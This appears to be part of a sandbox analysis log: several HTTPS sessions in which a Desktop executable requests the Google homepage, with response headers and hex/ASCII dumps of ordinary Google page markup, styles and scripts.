                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 70 78 3b 6f 70 61 63 69 74 79 3a 2e 34 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 3b 2a 6f 70 61 63 69 74 79 3a 31 3b 2a 74 6f 70 3a 2d 32 70 78 3b 2a 6c 65 66 74 3a 2d 35 70 78 3b 2a 72 69 67 68 74 3a 35 70 78 3b 2a 62 6f 74 74 6f 6d 3a 34 70 78 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 22 3b 6f 70 61 63 69 74 79 3a 31 5c 30 2f 3b 74 6f 70 3a 2d 34 70 78 5c 30 2f 3b 6c 65 66 74 3a 2d 36 70 78 5c
                                                                                                                                                                                                                            Data Ascii: px;opacity:.4;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.Blur(pixelradius=5)";opacity:1\0/;top:-4px\0/;left:-6px\
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 78 7d 2e 67 62 7a 30 6c 20 2e 67 62 74 73 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 74 73 61 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 39 70 78 7d 23 67 62 7a 20 2e 67 62 7a 74 2c 23 67 62 7a 20 2e 67 62 67 74 2c 23 67 62 67 20 2e 67 62 67 74 7b 63 6f 6c 6f 72 3a 23 63 63 63 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 62 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 67 62 74 6f 20 2e 67 62 7a 74 20 2e 67 62 74 62 32 2c 2e 67 62 74 6f 20 2e 67 62 67 74 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 30 7d 2e 67 62 74 62 20 2e 67 62 74 73 7b 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                                                                                                                                            Data Ascii: x}.gbz0l .gbts{color:#fff;font-weight:bold}.gbtsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .gbtb2{border-top-width:0}.gbtb .gbts{background
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 67 62 6d 70 69 2c 23 67 62 6d 70 69 64 2c 23 67 62 6d 70 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68
                                                                                                                                                                                                                            Data Ascii: x;margin-top:10px;position:relative}#gbmpi,#gbmpid,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(h
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 64 20 23 62 65 62 65 62 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 7d 23 67 62 64 34 20 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d 70 64 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61
                                                                                                                                                                                                                            Data Ascii: d #bebebe;font-size:0;margin:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid #bebebe;-moz-box-shadow:0 2px 4px rgba
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 6f 6e 74 3a 31 31 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 23 67 62 70 6d 73 7b 2a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 70 6d 73 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 67 62 6d 70 61 6c 7b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 6d 70 61 6c 61 2c 2e 67 62 6d 70 61 6c 62 7b 66 6f 6e 74 3a 31 33 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37
                                                                                                                                                                                                                            Data Ascii: ont:11px Arial,sans-serif}#gbpms{*white-space:nowrap}.gbpms2{font-weight:bold;white-space:nowrap}#gbmpal{*border-collapse:collapse;border-spacing:0;border:0;margin:0;white-space:nowrap;width:100%}.gbmpala,.gbmpalb{font:13px Arial,sans-serif;line-height:27


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            12192.168.2.749714142.250.186.1004435472C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC40OUTGET / HTTP/1.1
                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1199INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Tue, 14 Jan 2025 11:48:12 GMT
                                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                                            Cache-Control: private, max-age=0
                                                                                                                                                                                                                            Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                                            Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-WySdzhRazj8EFWxiEjjb4Q' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                            Set-Cookie: AEC=AZ6Zc-XqR_ULoWGONj-s6NXTu4PeT4hhaB_nqYxw5lXng2OkmW_Br6MLhwU; expires=Sun, 13-Jul-2025 11:48:12 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                                                                            Set-Cookie: NID=520=avOeTCYazIvBW6cEMSaMkT3hTgUhrMlwHwTYm0CHcTZMKDCsVan-VvhY0YHF_3UUKWmmd6eizWloCgLyb5epCllTMqw4VE0YcHekj5q2FsMwoy82XjBNrOp2viqOD9szZAWqFH7tNCcsjOdnBn5EAG4wRX34LTpy3FzKtH2slO9UWndD44e8U4vxHJP832RgqphoksmAv5Ew33WpZg; expires=Wed, 16-Jul-2025 11:48:12 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC191INData Raw: 34 63 63 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65
                                                                                                                                                                                                                            Data Ascii: 4cc5<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6f 64 70 2c 20 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74
                                                                                                                                                                                                                            Data Ascii: has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_st
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 34 2c 38 38 2c 34 38 37 2c 31 35 32 2c 33 36 31 2c 34 39 2c 36 33 37 2c 32 2c 33 2c 33 37 39 2c 32 2c 31 33 33 32 2c 36 31 2c 31 34 32 2c 36 30 32 2c 36 31 2c 32 36 2c 31 35 37 2c 39 31 35 2c 32 30 34 2c 32 2c 36 32 37 2c 31 37 31 2c 38 37 2c 32 35 37 2c 32 33 38 2c 31 36 37 2c 34 38 34 2c 32 31 34 2c 39 33 38 2c 35 34 38 2c 33 35 34 2c 33 30 34 2c 33 2c 32 37 2c 33 32 34 2c 35 30 38 2c 31 37 2c 33 2c 36 37 36 2c 31 30 34 2c 32 30 2c 38 30 36 2c 31 2c 34 31 34 2c 32 2c 31 30 35 39 2c 33 36 38 2c 36 30 32 2c 37 33 2c 31 36 39 2c 33 2c 34 31 30 2c 36 39 35 2c 39 31 33 2c 31 2c 35 2c 34 2c 34 2c 34 2c 31 36 32 2c 32 31 2c 35 2c 37 30 31 2c 36 34 37 2c 33 2c 31 30 2c 32 31 30 2c 34 39 38 2c 33 30 38 2c 33 33 34 2c 31 32 2c 31 2c 31 2c 38 30 2c 32 31 30 2c 37
                                                                                                                                                                                                                            Data Ascii: 4,88,487,152,361,49,637,2,3,379,2,1332,61,142,602,61,26,157,915,204,2,627,171,87,257,238,167,484,214,938,548,354,304,3,27,324,508,17,3,676,104,20,806,1,414,2,1059,368,602,73,169,3,410,695,913,1,5,4,4,4,162,21,5,701,647,3,10,210,498,308,334,12,1,1,80,210,7
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6d 5b 66 5d 7d 3b 61 2e 73 72 63 3d 64 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 62 3b 72 65 74 75 72 6e 20 72 28 22 22 2c 61 2c 62 29 7d
                                                                                                                                                                                                                            Data Ascii: ){return null};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===void 0?k:b;return r("",a,b)}
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 2e 63 61 6c 6c 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 67 62 7b 66 6f 6e 74 3a 31 33 70 78 2f 32 37 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 23 67 62 7a 7b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 23 67 62 67 7b 72 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 23 67 62 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f
                                                                                                                                                                                                                            Data Ascii: .call(this);</script><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:transparent;position:abso
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 74 6f 6d 3a 2d 32 70 78 3b 6f 70 61 63 69 74 79 3a 2e 34 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 3b 2a 6f 70 61 63 69 74 79 3a 31 3b 2a 74 6f 70 3a 2d 32 70 78 3b 2a 6c 65 66 74 3a 2d 35 70 78 3b 2a 72 69 67 68 74 3a 35 70 78 3b 2a 62 6f 74 74 6f 6d 3a 34 70 78 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 22 3b 6f 70 61 63 69 74 79 3a 31 5c 30 2f 3b 74 6f 70 3a 2d 34 70 78 5c 30 2f 3b 6c 65 66 74
                                                                                                                                                                                                                            Data Ascii: tom:-2px;opacity:.4;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.Blur(pixelradius=5)";opacity:1\0/;top:-4px\0/;left
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 74 6f 70 3a 32 70 78 7d 2e 67 62 7a 30 6c 20 2e 67 62 74 73 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 74 73 61 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 39 70 78 7d 23 67 62 7a 20 2e 67 62 7a 74 2c 23 67 62 7a 20 2e 67 62 67 74 2c 23 67 62 67 20 2e 67 62 67 74 7b 63 6f 6c 6f 72 3a 23 63 63 63 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 62 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 67 62 74 6f 20 2e 67 62 7a 74 20 2e 67 62 74 62 32 2c 2e 67 62 74 6f 20 2e 67 62 67 74 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 30 7d 2e 67 62 74 62 20 2e 67 62 74 73 7b 62 61 63 6b
                                                                                                                                                                                                                            Data Ascii: top:2px}.gbz0l .gbts{color:#fff;font-weight:bold}.gbtsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .gbtb2{border-top-width:0}.gbtb .gbts{back
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 66 74 3a 32 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 67 62 6d 70 69 2c 23 67 62 6d 70 69 64 2c 23 67 62 6d 70 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b 5f 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                                                                                                                                            Data Ascii: ft:20px;margin-top:10px;position:relative}#gbmpi,#gbmpid,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 7d 23 67 62 64 34 20 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d 70 64 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70
                                                                                                                                                                                                                            Data Ascii: x solid #bebebe;font-size:0;margin:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid #bebebe;-moz-box-shadow:0 2px 4p
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 74 61 6e 74 3b 66 6f 6e 74 3a 31 31 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 23 67 62 70 6d 73 7b 2a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 70 6d 73 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 67 62 6d 70 61 6c 7b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 6d 70 61 6c 61 2c 2e 67 62 6d 70 61 6c 62 7b 66 6f 6e 74 3a 31 33 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6c 69 6e 65 2d 68 65 69
                                                                                                                                                                                                                            Data Ascii: tant;font:11px Arial,sans-serif}#gbpms{*white-space:nowrap}.gbpms2{font-weight:bold;white-space:nowrap}#gbmpal{*border-collapse:collapse;border-spacing:0;border:0;margin:0;white-space:nowrap;width:100%}.gbmpala,.gbmpalb{font:13px Arial,sans-serif;line-hei


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            13192.168.2.749721142.250.186.1004435472C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC40OUTGET / HTTP/1.1
                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1199INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Tue, 14 Jan 2025 11:48:12 GMT
                                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                                            Cache-Control: private, max-age=0
                                                                                                                                                                                                                            Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                                            Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-8tpbJN0R3bXCRIc99zus4g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                            Set-Cookie: AEC=AZ6Zc-UdAEG-0YgU9SeTarKaazFk3jPN77iTPd-UDOe8gc9tzj5dDy_vk08; expires=Sun, 13-Jul-2025 11:48:12 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                                                                            Set-Cookie: NID=520=eMxFEKmAAY2b0kgiq0uopMVq6shDjSTN0FG8eBb0XXrlTy-vJBJ3S9p-6s41OkuRTkhm7B40rIysXWImQqxv2Uukr-dFQc_T2LjAWSSWwx-wBKCpyUS5eHwnuN5ftlZ4l6fl467WCE--b-TpiQLr3YLu1mNWC7ZAtNPcco69TnT2E92ddsUaMPdoGvfxxRAfmM93H1EP6q6WzZA4bw; expires=Wed, 16-Jul-2025 11:48:12 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC191INData Raw: 34 66 62 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65
                                                                                                                                                                                                                            Data Ascii: 4fba<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google
